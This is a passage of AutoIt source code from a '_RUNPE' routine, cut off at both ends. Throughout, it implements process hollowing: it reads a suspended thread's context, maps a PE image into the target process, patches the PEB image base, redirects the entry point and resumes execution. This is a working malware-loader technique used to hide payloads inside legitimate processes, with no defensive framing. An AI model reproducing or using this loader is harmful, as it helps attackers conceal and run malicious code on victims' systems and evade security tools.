"PTR", DLLSTRUCTGETPTR($TSTARTUPINFO), _ "PTR", DLLSTRUCTGETPTR($TPROCESS_INFORMATION)) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN RETURN SETERROR(1, 0, 0) ; CREATEPROCESS FUNCTION OR CALL TO IT FAILED ; GET NEW PROCESS AND THREAD HANDLES: LOCAL $HPROCESS = DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "PROCESS") LOCAL $HTHREAD = DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "THREAD") ; CHECK FOR 'WRONG' BIT-NESS. NOT BECAUSE IT COULD'T BE IMPLEMENTED, BUT BESAUSE IT WOULD BE UGLYER (STRUCTURES) IF $FAUTOITX64 AND __RUNPE_ISWOW64PROCESS($HPROCESS) THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(2, 0, 0) ENDIF #REGION 4. FILL CONTEXT STRUCTURE ; CONTEXT STRUCTURE IS WHAT'S REALLY IMPORTANT HERE. IT'S PROCESSOR SPECIFIC. LOCAL $IRUNFLAG, $TCONTEXT IF $FAUTOITX64 THEN IF @OSARCH = "X64" THEN $IRUNFLAG = 2 $TCONTEXT = DLLSTRUCTCREATE( _ "ALIGN 16; UINT64 P1HOME; UINT64 P2HOME; UINT64 P3HOME; UINT64 P4HOME; UINT64 P5HOME; UINT64 P6HOME;" & _ ; REGISTER PARAMETER HOME ADDRESSES "DWORD CONTEXTFLAGS; DWORD MXCSR;" & _ ; CONTROL FLAGS "WORD SEGCS; WORD SEGDS; WORD SEGES; WORD SEGFS; WORD SEGGS; WORD SEGSS; DWORD EFLAGS;" & _ ; SEGMENT REGISTERS AND PROCESSOR FLAGS "UINT64 DR0; UINT64 DR1; UINT64 DR2; UINT64 DR3; UINT64 DR6; UINT64 DR7;" & _ ; DEBUG REGISTERS "UINT64 RAX; UINT64 RCX; UINT64 RDX; UINT64 RBX; UINT64 RSP; UINT64 RBP; UINT64 RSI; UINT64 RDI; UINT64 R8; UINT64 R9; UINT64 R10; UINT64 R11; UINT64 R12; UINT64 R13; UINT64 R14; UINT64 R15;" & _ ; INTEGER REGISTERS "UINT64 RIP;" & _ ; PROGRAM COUNTER "UINT64 HEADER[4]; UINT64 LEGACY[16]; UINT64 XMM0[2]; UINT64 XMM1[2]; UINT64 XMM2[2]; UINT64 XMM3[2]; UINT64 XMM4[2]; UINT64 XMM5[2]; UINT64 XMM6[2]; UINT64 XMM7[2]; UINT64 XMM8[2]; UINT64 XMM9[2]; UINT64 XMM10[2]; UINT64 XMM11[2]; UINT64 XMM12[2]; UINT64 XMM13[2]; UINT64 XMM14[2]; UINT64 XMM15[2];" & _ ; FLOATING POINT STATE (TYPES ARE NOT CORRECT FOR SIMPLICITY REASONS!!!) "UINT64 VECTORREGISTER[52]; UINT64 VECTORCONTROL;" & _ ; VECTOR REGISTERS (TYPE FOR VECTORREGISTER IS NOT CORRECT FOR SIMPLICITY REASONS!!!) "UINT64 DEBUGCONTROL; UINT64 LASTBRANCHTORIP; UINT64 LASTBRANCHFROMRIP; UINT64 LASTEXCEPTIONTORIP; UINT64 LASTEXCEPTIONFROMRIP") ; SPECIAL DEBUG CONTROL REGISTERS ELSE $IRUNFLAG = 3 ; FIXME - ITANIUM ARCHITECTURE ; RETURN SPECIAL ERROR NUMBER: DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(102, 0, 0) ENDIF ELSE $IRUNFLAG = 1 $TCONTEXT = DLLSTRUCTCREATE( _ "DWORD CONTEXTFLAGS;" & _ ; CONTROL FLAGS "DWORD DR0; DWORD DR1; DWORD DR2; DWORD DR3; DWORD DR6; DWORD DR7;" & _ ; CONTEXT_DEBUG_REGISTERS "DWORD CONTROLWORD; DWORD STATUSWORD; DWORD TAGWORD; DWORD ERROROFFSET; DWORD ERRORSELECTOR; DWORD DATAOFFSET; DWORD DATASELECTOR; BYTE REGISTERAREA[80]; DWORD CR0NPXSTATE;" & _ ; CONTEXT_FLOATING_POINT "DWORD SEGGS; DWORD SEGFS; DWORD SEGES; DWORD SEGDS;" & _ ; CONTEXT_SEGMENTS "DWORD EDI; DWORD ESI; DWORD EBX; DWORD EDX; DWORD ECX; DWORD EAX;" & _ ; CONTEXT_INTEGER "DWORD EBP; DWORD EIP; DWORD SEGCS; DWORD EFLAGS; DWORD ESP; DWORD SEGSS;" & _ ; CONTEXT_CONTROL "BYTE EXTENDEDREGISTERS[512]") ; CONTEXT_EXTENDED_REGISTERS ENDIF ; DEFINE CONTEXT_FULL LOCAL $CONTEXT_FULL SWITCH $IRUNFLAG CASE 1 $CONTEXT_FULL = 0X10007 CASE 2 $CONTEXT_FULL = 0X100007 CASE 3 $CONTEXT_FULL = 0X80027 ENDSWITCH ; SET DESIRED ACCESS DLLSTRUCTSETDATA($TCONTEXT, "CONTEXTFLAGS", $CONTEXT_FULL) ; FILL CONTEXT STRUCTURE: $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "GetThreadContext", _ "HANDLE", $HTHREAD, _ "PTR", DLLSTRUCTGETPTR($TCONTEXT)) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(3, 0, 0) ; GETTHREADCONTEXT FUNCTION OR CALL TO IT FAILED ENDIF ; POINTER TO PEB STRUCTURE LOCAL $PPEB SWITCH $IRUNFLAG CASE 1 $PPEB = DLLSTRUCTGETDATA($TCONTEXT, "EBX") CASE 2 $PPEB = DLLSTRUCTGETDATA($TCONTEXT, "RDX") CASE 3 ; FIXME - ITANIUM ARCHITECTURE ENDSWITCH #REGION 5. READ PE-FORMAT ; START PROCESSING PASSED BINARY DATA. 'READING' PE FORMAT FOLLOWS. ; FIRST IS IMAGE_DOS_HEADER LOCAL $TIMAGE_DOS_HEADER = DLLSTRUCTCREATE( _ "CHAR MAGIC[2];" & _ "WORD BYTESONLASTPAGE;" & _ "WORD PAGES;" & _ "WORD RELOCATIONS;" & _ "WORD SIZEOFHEADER;" & _ "WORD MINIMUMEXTRA;" & _ "WORD MAXIMUMEXTRA;" & _ "WORD SS;" & _ "WORD SP;" & _ "WORD CHECKSUM;" & _ "WORD IP;" & _ "WORD CS;" & _ "WORD RELOCATION;" & _ "WORD OVERLAY;" & _ "CHAR RESERVED[8];" & _ "WORD OEMIDENTIFIER;" & _ "WORD OEMINFORMATION;" & _ "CHAR RESERVED2[20];" & _ "DWORD ADDRESSOFNEWEXEHEADER",$PPOINTER) ; SAVE THIS POINTER VALUE (IT'S STARTING ADDRESS OF BINARY IMAGE HEADERS) LOCAL $PHEADERS_NEW = $PPOINTER ; MOVE POINTER $PPOINTER += DLLSTRUCTGETDATA($TIMAGE_DOS_HEADER, "ADDRESSOFNEWEXEHEADER") ; MOVE TO PE FILE HEADER ; GET "MAGIC" LOCAL $SMAGIC = DLLSTRUCTGETDATA($TIMAGE_DOS_HEADER, "MAGIC") ; CHECK IF IT'S VALID FORMAT IF NOT ($SMAGIC == "MZ") THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(4, 0, 0) ; MS-DOS HEADER MISSING. ENDIF ; IN PLACE OF IMAGE_NT_SIGNATURE LOCAL $TIMAGE_NT_SIGNATURE = DLLSTRUCTCREATE("DWORD SIGNATURE", $PPOINTER) ; MOVE POINTER $PPOINTER += 4 ; SIZE OF $TIMAGE_NT_SIGNATURE STRUCTURE ; CHECK SIGNATURE IF DLLSTRUCTGETDATA($TIMAGE_NT_SIGNATURE, "SIGNATURE") <> 17744 THEN ; IMAGE_NT_SIGNATURE DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(5, 0, 0) ; WRONG SIGNATURE. FOR PE IMAGE SHOULD BE "PE00" OR 17744 DWORD. ENDIF ; IN PLACE OF IMAGE_FILE_HEADER LOCAL $TIMAGE_FILE_HEADER = DLLSTRUCTCREATE("WORD MACHINE;" & _ "WORD NUMBEROFSECTIONS;" & _ "DWORD TIMEDATESTAMP;" & _ "DWORD POINTERTOSYMBOLTABLE;" & _ "DWORD NUMBEROFSYMBOLS;" & _ "WORD SIZEOFOPTIONALHEADER;" & _ "WORD CHARACTERISTICS", _ $PPOINTER) ; I COULD CHECK HERE IF THE MODULE IS RELOCATABLE ; LOCAL $FRELOCATABLE ; IF BITAND(DLLSTRUCTGETDATA($TIMAGE_FILE_HEADER, "CHARACTERISTICS"), 1) THEN $FRELOCATABLE = FALSE ; BUT I WON'T (WILL CHECK DATA IN IMAGE_DIRECTORY_ENTRY_BASERELOC INSTEAD) ; GET NUMBER OF SECTIONS LOCAL $INUMBEROFSECTIONS = DLLSTRUCTGETDATA($TIMAGE_FILE_HEADER, "NUMBEROFSECTIONS") ; MOVE POINTER $PPOINTER += 20 ; SIZE OF $TIMAGE_FILE_HEADER STRUCTURE ; IN PLACE OF IMAGE_OPTIONAL_HEADER LOCAL $TMAGIC = DLLSTRUCTCREATE("WORD MAGIC;", $PPOINTER) LOCAL $IMAGIC = DLLSTRUCTGETDATA($TMAGIC, 1) LOCAL $TIMAGE_OPTIONAL_HEADER IF $IMAGIC = 267 THEN ; X86 VERSION IF $FAUTOITX64 THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS ENDIF $TIMAGE_OPTIONAL_HEADER = DLLSTRUCTCREATE( _ "WORD MAGIC;" & _ "BYTE MAJORLINKERVERSION;" & _ "BYTE MINORLINKERVERSION;" & _ "DWORD SIZEOFCODE;" & _ "DWORD SIZEOFINITIALIZEDDATA;" & _ "DWORD SIZEOFUNINITIALIZEDDATA;" & _ "DWORD ADDRESSOFENTRYPOINT;" & _ "DWORD BASEOFCODE;" & _ "DWORD BASEOFDATA;" & _ "DWORD IMAGEBASE;" & _ "DWORD SECTIONALIGNMENT;" & _ "DWORD FILEALIGNMENT;" & _ "WORD MAJOROPERATINGSYSTEMVERSION;" & _ "WORD MINOROPERATINGSYSTEMVERSION;" & _ "WORD MAJORIMAGEVERSION;" & _ "WORD MINORIMAGEVERSION;" & _ "WORD MAJORSUBSYSTEMVERSION;" & _ "WORD MINORSUBSYSTEMVERSION;" & _ "DWORD WIN32VERSIONVALUE;" & _ "DWORD SIZEOFIMAGE;" & _ "DWORD SIZEOFHEADERS;" & _ "DWORD CHECKSUM;" & _ "WORD SUBSYSTEM;" & _ "WORD DLLCHARACTERISTICS;" & _ "DWORD SIZEOFSTACKRESERVE;" & _ "DWORD SIZEOFSTACKCOMMIT;" & _ "DWORD SIZEOFHEAPRESERVE;" & _ "DWORD SIZEOFHEAPCOMMIT;" & _ "DWORD LOADERFLAGS;" & _ "DWORD NUMBEROFRVAANDSIZES",$PPOINTER) ; MOVE POINTER $PPOINTER += 96 ; SIZE OF $TIMAGE_OPTIONAL_HEADER ELSEIF $IMAGIC = 523 THEN ; X64 VERSION IF NOT $FAUTOITX64 THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS ENDIF $TIMAGE_OPTIONAL_HEADER = DLLSTRUCTCREATE( _ "WORD MAGIC;" & _ "BYTE MAJORLINKERVERSION;" & _ "BYTE MINORLINKERVERSION;" & _ "DWORD SIZEOFCODE;" & _ "DWORD SIZEOFINITIALIZEDDATA;" & _ "DWORD SIZEOFUNINITIALIZEDDATA;" & _ "DWORD ADDRESSOFENTRYPOINT;" & _ "DWORD BASEOFCODE;" & _ "UINT64 IMAGEBASE;" & _ "DWORD SECTIONALIGNMENT;" & _ "DWORD FILEALIGNMENT;" & _ "WORD MAJOROPERATINGSYSTEMVERSION;" & _ "WORD MINOROPERATINGSYSTEMVERSION;" & _ "WORD MAJORIMAGEVERSION;" & _ "WORD MINORIMAGEVERSION;" & _ "WORD MAJORSUBSYSTEMVERSION;" & _ "WORD MINORSUBSYSTEMVERSION;" & _ "DWORD WIN32VERSIONVALUE;" & _ "DWORD SIZEOFIMAGE;" & _ "DWORD SIZEOFHEADERS;" & _ "DWORD CHECKSUM;" & _ "WORD SUBSYSTEM;" & _ "WORD DLLCHARACTERISTICS;" & _ "UINT64 SIZEOFSTACKRESERVE;" & _ "UINT64 SIZEOFSTACKCOMMIT;" & _ "UINT64 SIZEOFHEAPRESERVE;" & _ "UINT64 SIZEOFHEAPCOMMIT;" & _ "DWORD LOADERFLAGS;" & _ "DWORD NUMBEROFRVAANDSIZES",$PPOINTER) ; MOVE POINTER $PPOINTER += 112 ; SIZE OF $TIMAGE_OPTIONAL_HEADER ELSE DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(6, 0, 0) ; INCOMPATIBLE VERSIONS ENDIF ; EXTRACT ENTRY POINT ADDRESS LOCAL $IENTRYPOINTNEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "ADDRESSOFENTRYPOINT") ; IF LOADED BINARY IMAGE WOULD START EXECUTING AT THIS ADDRESS ; AND OTHER INTERESTING INFORMATIONS LOCAL $IOPTIONALHEADERSIZEOFHEADERSNEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "SIZEOFHEADERS") LOCAL $POPTIONALHEADERIMAGEBASENEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "IMAGEBASE") ; ADDRESS OF THE FIRST BYTE OF THE IMAGE WHEN IT'S LOADED IN MEMORY LOCAL $IOPTIONALHEADERSIZEOFIMAGENEW = DLLSTRUCTGETDATA($TIMAGE_OPTIONAL_HEADER, "SIZEOFIMAGE") ; THE SIZE OF THE IMAGE INCLUDING ALL HEADERS ; MOVE POINTER $PPOINTER += 8 ; SKIPPING IMAGE_DIRECTORY_ENTRY_EXPORT $PPOINTER += 8 ; SIZE OF $TIMAGE_DIRECTORY_ENTRY_IMPORT $PPOINTER += 24 ; SKIPPING IMAGE_DIRECTORY_ENTRY_RESOURCE, IMAGE_DIRECTORY_ENTRY_EXCEPTION, IMAGE_DIRECTORY_ENTRY_SECURITY ; BASE RELOCATION DIRECTORY LOCAL $TIMAGE_DIRECTORY_ENTRY_BASERELOC = DLLSTRUCTCREATE("DWORD VIRTUALADDRESS; DWORD SIZE", $PPOINTER) ; COLLECT DATA LOCAL $PADDRESSNEWBASERELOC = DLLSTRUCTGETDATA($TIMAGE_DIRECTORY_ENTRY_BASERELOC, "VIRTUALADDRESS") LOCAL $ISIZEBASERELOC = DLLSTRUCTGETDATA($TIMAGE_DIRECTORY_ENTRY_BASERELOC, "SIZE") LOCAL $FRELOCATABLE IF $PADDRESSNEWBASERELOC AND $ISIZEBASERELOC THEN $FRELOCATABLE = TRUE IF NOT $FRELOCATABLE THEN CONSOLEWRITE("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) ; NOTHING CAN BE DONE HERE ; MOVE POINTER $PPOINTER += 88 ; SIZE OF THE STRUCTURES BEFORE IMAGE_SECTION_HEADER (16 OF THEM). #REGION 6. ALLOCATE 'NEW' MEMORY SPACE LOCAL $FRELOCATE LOCAL $PZEROPOINT IF $FRELOCATABLE THEN ; IF THE MODULE CAN BE RELOCATED THEN ALLOCATE MEMORY ANYWHERE POSSIBLE $PZEROPOINT = __RUNPE_ALLOCATEEXESPACE($HPROCESS, $IOPTIONALHEADERSIZEOFIMAGENEW) ; IN CASE OF FAILURE TRY AT ORIGINAL ADDRESS IF @ERROR THEN $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW) IF @ERROR THEN __RUNPE_UNMAPVIEWOFSECTION($HPROCESS, $POPTIONALHEADERIMAGEBASENEW) ; TRY NOW $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW) IF @ERROR THEN ; RETURN SPECIAL ERROR NUMBER: DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(101, 1, 0) ENDIF ENDIF ENDIF $FRELOCATE = TRUE ELSE ; AND IF NOT TRY WHERE IT SHOULD BE $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW) IF @ERROR THEN __RUNPE_UNMAPVIEWOFSECTION($HPROCESS, $POPTIONALHEADERIMAGEBASENEW) ; TRY NOW $PZEROPOINT = __RUNPE_ALLOCATEEXESPACEATADDRESS($HPROCESS, $POPTIONALHEADERIMAGEBASENEW, $IOPTIONALHEADERSIZEOFIMAGENEW) IF @ERROR THEN ; RETURN SPECIAL ERROR NUMBER: DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(101, 0, 0) ENDIF ENDIF ENDIF ; IF THERE IS NEW IMAGEBASE VALUE, SAVE IT DLLSTRUCTSETDATA($TIMAGE_OPTIONAL_HEADER, "IMAGEBASE", $PZEROPOINT) #REGION 7. CONSTRUCT THE NEW MODULE ; ALLOCATE ENOUGH SPACE (IN OUR SPACE) FOR THE NEW MODULE LOCAL $TMODULE = DLLSTRUCTCREATE("BYTE[" & $IOPTIONALHEADERSIZEOFIMAGENEW & "]") ; GET POINTER LOCAL $PMODULE = DLLSTRUCTGETPTR($TMODULE) ; HEADERS LOCAL $THEADERS = DLLSTRUCTCREATE("BYTE[" & $IOPTIONALHEADERSIZEOFHEADERSNEW & "]", $PHEADERS_NEW) ; WRITE HEADERS TO $TMODULE DLLSTRUCTSETDATA($TMODULE, 1, DLLSTRUCTGETDATA($THEADERS, 1)) ; WRITE SECTIONS NOW. $PPOINTER IS CURRENTLY IN PLACE OF SECTIONS LOCAL $TIMAGE_SECTION_HEADER LOCAL $ISIZEOFRAWDATA, $PPOINTERTORAWDATA LOCAL $IVIRTUALADDRESS, $IVIRTUALSIZE LOCAL $TRELOCRAW ; LOOP THROUGH SECTIONS FOR $I = 1 TO $INUMBEROFSECTIONS $TIMAGE_SECTION_HEADER = DLLSTRUCTCREATE( _ "CHAR NAME[8];" & _ "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & _ "DWORD VIRTUALADDRESS;" & _ "DWORD SIZEOFRAWDATA;" & _ "DWORD POINTERTORAWDATA;" & _ "DWORD POINTERTORELOCATIONS;" & _ "DWORD POINTERTOLINENUMBERS;" & _ "WORD NUMBEROFRELOCATIONS;" & _ "WORD NUMBEROFLINENUMBERS;" & _ "DWORD CHARACTERISTICS",$PPOINTER) ; COLLECT DATA $ISIZEOFRAWDATA = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "SIZEOFRAWDATA") $PPOINTERTORAWDATA = $PHEADERS_NEW + DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "POINTERTORAWDATA") $IVIRTUALADDRESS = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "VIRTUALADDRESS") $IVIRTUALSIZE = DLLSTRUCTGETDATA($TIMAGE_SECTION_HEADER, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS") IF $IVIRTUALSIZE AND $IVIRTUALSIZE < $ISIZEOFRAWDATA THEN $ISIZEOFRAWDATA = $IVIRTUALSIZE ; IF THERE IS DATA TO WRITE, WRITE IT IF $ISIZEOFRAWDATA THEN DLLSTRUCTSETDATA(DLLSTRUCTCREATE("BYTE[" & $ISIZEOFRAWDATA & "]", $PMODULE + $IVIRTUALADDRESS), 1, DLLSTRUCTGETDATA(DLLSTRUCTCREATE("BYTE[" & $ISIZEOFRAWDATA & "]", $PPOINTERTORAWDATA), 1)) ENDIF ; RELOCATIONS IF $FRELOCATE THEN IF $IVIRTUALADDRESS <= $PADDRESSNEWBASERELOC AND $IVIRTUALADDRESS + $ISIZEOFRAWDATA > $PADDRESSNEWBASERELOC THEN $TRELOCRAW = DLLSTRUCTCREATE("BYTE[" & $ISIZEBASERELOC & "]", $PPOINTERTORAWDATA + ($PADDRESSNEWBASERELOC - $IVIRTUALADDRESS)) ENDIF ENDIF ; MOVE POINTER $PPOINTER += 40 ; SIZE OF $TIMAGE_SECTION_HEADER STRUCTURE NEXT ; FIX RELOCATIONS IF $FRELOCATE THEN __RUNPE_FIXRELOC($PMODULE, $TRELOCRAW, $PZEROPOINT, $POPTIONALHEADERIMAGEBASENEW, $IMAGIC = 523) ; WRITE NEWLY CONSTRUCTED MODULE TO ALLOCATED SPACE INSIDE THE $HPROCESS $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "WriteProcessMemory", _ "HANDLE", $HPROCESS, _ "PTR", $PZEROPOINT, _ "PTR", $PMODULE, _ "DWORD_PTR", $IOPTIONALHEADERSIZEOFIMAGENEW, _ "DWORD_PTR*", 0) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(7, 0, 0) ; WRITEPROCESSMEMORY FUNCTION OR CALL TO IT WHILE WRITTING NEW MODULE BINARY ENDIF #REGION 8. PEB IMAGEBASEADDRESS MANIPULATION ; PEB STRUCTURE DEFINITION LOCAL $TPEB = DLLSTRUCTCREATE( _ "BYTE INHERITEDADDRESSSPACE;" & _ "BYTE READIMAGEFILEEXECOPTIONS;" & _ "BYTE BEINGDEBUGGED;" & _ "BYTE SPARE;" & _ "PTR MUTANT;" & _ "PTR IMAGEBASEADDRESS;" & _ "PTR LOADERDATA;" & _ "PTR PROCESSPARAMETERS;" & _ "PTR SUBSYSTEMDATA;" & _ "PTR PROCESSHEAP;" & _ "PTR FASTPEBLOCK;" & _ "PTR FASTPEBLOCKROUTINE;" & _ "PTR FASTPEBUNLOCKROUTINE;" & _ "DWORD ENVIRONMENTUPDATECOUNT;" & _ "PTR KERNELCALLBACKTABLE;" & _ "PTR EVENTLOGSECTION;" & _ "PTR EVENTLOG;" & _ "PTR FREELIST;" & _ "DWORD TLSEXPANSIONCOUNTER;" & _ "PTR TLSBITMAP;" & _ "DWORD TLSBITMAPBITS[2];" & _ "PTR READONLYSHAREDMEMORYBASE;" & _ "PTR READONLYSHAREDMEMORYHEAP;" & _ "PTR READONLYSTATICSERVERDATA;" & _ "PTR ANSICODEPAGEDATA;" & _ "PTR OEMCODEPAGEDATA;" & _ "PTR UNICODECASETABLEDATA;" & _ "DWORD NUMBEROFPROCESSORS;" & _ "DWORD NTGLOBALFLAG;" & _ "BYTE SPARE2[4];" & _ "INT64 CRITICALSECTIONTIMEOUT;" & _ "DWORD HEAPSEGMENTRESERVE;" & _ "DWORD HEAPSEGMENTCOMMIT;" & _ "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & _ "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & _ "DWORD NUMBEROFHEAPS;" & _ "DWORD MAXIMUMNUMBEROFHEAPS;" & _ "PTR PROCESSHEAPS;" & _ "PTR GDISHAREDHANDLETABLE;" & _ "PTR PROCESSSTARTERHELPER;" & _ "PTR GDIDCATTRIBUTELIST;" & _ "PTR LOADERLOCK;" & _ "DWORD OSMAJORVERSION;" & _ "DWORD OSMINORVERSION;" & _ "DWORD OSBUILDNUMBER;" & _ "DWORD OSPLATFORMID;" & _ "DWORD IMAGESUBSYSTEM;" & _ "DWORD IMAGESUBSYSTEMMAJORVERSION;" & _ "DWORD IMAGESUBSYSTEMMINORVERSION;" & _ "DWORD GDIHANDLEBUFFER[34];" & _ "DWORD POSTPROCESSINITROUTINE;" & _ "DWORD TLSEXPANSIONBITMAP;" & _ "BYTE TLSEXPANSIONBITMAPBITS[128];" & _ "DWORD SESSIONID") ; FILL THE STRUCTURE $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "ReadProcessMemory", _ "PTR", $HPROCESS, _ "PTR", $PPEB, _ ; POINTER TO PEB STRUCTURE "PTR", DLLSTRUCTGETPTR($TPEB), _ "DWORD_PTR", DLLSTRUCTGETSIZE($TPEB), _ "DWORD_PTR*", 0) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(8, 0, 0) ; READPROCESSMEMORY FUNCTION OR CALL TO IT FAILED WHILE FILLING PEB STRUCTURE ENDIF ; CHANGE BASE ADDRESS WITHIN PEB DLLSTRUCTSETDATA($TPEB, "IMAGEBASEADDRESS", $PZEROPOINT) ; WRITE THE CHANGES $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "WriteProcessMemory", _ "HANDLE", $HPROCESS, _ "PTR", $PPEB, _ "PTR", DLLSTRUCTGETPTR($TPEB), _ "DWORD_PTR", DLLSTRUCTGETSIZE($TPEB), _ "DWORD_PTR*", 0) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR NOT $ACALL[0] THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(9, 0, 0) ; WRITEPROCESSMEMORY FUNCTION OR CALL TO IT FAILED WHILE CHANGING BASE ADDRESS ENDIF #REGION 9. NEW ENTRY POINT ; ENTRY POINT MANIPULATION SWITCH $IRUNFLAG CASE 1 DLLSTRUCTSETDATA($TCONTEXT, "EAX", $PZEROPOINT + $IENTRYPOINTNEW) CASE 2 DLLSTRUCTSETDATA($TCONTEXT, "RCX", $PZEROPOINT + $IENTRYPOINTNEW) CASE 3 ; FIXME - ITANIUM ARCHITECTURE ENDSWITCH #REGION 10. SET NEW CONTEXT ; NEW CONTEXT: $ACALL = DLLCALL("KERNEL32.DLL", "BOOL", "SetThreadContext", _ "HANDLE", $HTHREAD, _ "PTR", DLLSTRUCTGETPTR($TCONTEXT)) IF @ERROR OR NOT $ACALL[0] THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(10, 0, 0) ; SETTHREADCONTEXT FUNCTION OR CALL TO IT FAILED ENDIF #REGION 11. RESUME THREAD ; AND THAT'S IT!. CONTINUE EXECUTION: $ACALL = DLLCALL("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $HTHREAD) ; CHECK FOR ERRORS OR FAILURE IF @ERROR OR $ACALL[0] = -1 THEN DLLCALL("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $HPROCESS, "DWORD", 0) RETURN SETERROR(11, 0, 0) ; RESUMETHREAD FUNCTION OR CALL TO IT FAILED ENDIF #REGION 12. CLOSE OPEN HANDLES AND RETURN PID DLLCALL("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $HPROCESS) DLLCALL("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $HTHREAD) ; ALL WENT WELL. RETURN NEW PID: RETURN DLLSTRUCTGETDATA($TPROCESS_INFORMATION, "PROCESSID") ENDFUNC ;==>_RUNPE FUNC __RUNPE_FIXRELOC ($PMODULE, $TDATA, $PADDRESSNEW, $PADDRESSOLD, $FIMAGEX64) LOCAL $IDELTA = $PADDRESSNEW - $PADDRESSOLD ; DISLOCATION VALUE LOCAL $ISIZE = DLLSTRUCTGETSIZE($TDATA) ; SIZE OF DATA LOCAL $PDATA = DLLSTRUCTGETPTR($TDATA) ; ADDRES OF THE DATA STRUCTURE LOCAL $TIMAGE_BASE_RELOCATION, $IRELATIVEMOVE LOCAL $IVIRTUALADDRESS, $ISIZEOFBLOCK, $INUMBEROFENTRIES LOCAL $TENRIES, $IDATA, $TADDRESS LOCAL $IFLAG = 3 + 7 * $FIMAGEX64 ; IMAGE_REL_BASED_HIGHLOW = 3 OR IMAGE_REL_BASED_DIR64 = 10 WHILE $IRELATIVEMOVE < $ISIZE ; FOR ALL DATA AVAILABLE $TIMAGE_BASE_RELOCATION = DLLSTRUCTCREATE("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $PDATA + $IRELATIVEMOVE) $IVIRTUALADDRESS = DLLSTRUCTGETDATA($TIMAGE_BASE_RELOCATION, "VIRTUALADDRESS") $ISIZEOFBLOCK = DLLSTRUCTGETDATA($TIMAGE_BASE_RELOCATION, "SIZEOFBLOCK") $INUMBEROFENTRIES = ($ISIZEOFBLOCK - 8) / 2 $TENRIES = DLLSTRUCTCREATE("WORD[" & $INUMBEROFENTRIES & "]", DLLSTRUCTGETPTR($TIMAGE_BASE_RELOCATION) + 8) ; GO THROUGH ALL ENTRIES FOR $I = 1 TO $INUMBEROFENTRIES $IDATA = DLLSTRUCTGETDATA($TENRIES, 1, $I) IF BITSHIFT($IDATA, 12) = $IFLAG THEN ; CHECK TYPE $TADDRESS = DLLSTRUCTCREATE("PTR", $PMODULE + $IVIRTUALADDRESS + BITAND($IDATA, 0XFFF)) ; THE REST OF $IDATA IS OFFSET DLLSTRUCTSETDATA($TADDRESS, 1, DLLSTRUCTGETDATA($TADDRESS, 1) + $IDELTA) ; THIS IS WHAT'S THIS ALL ABOUT ENDIF 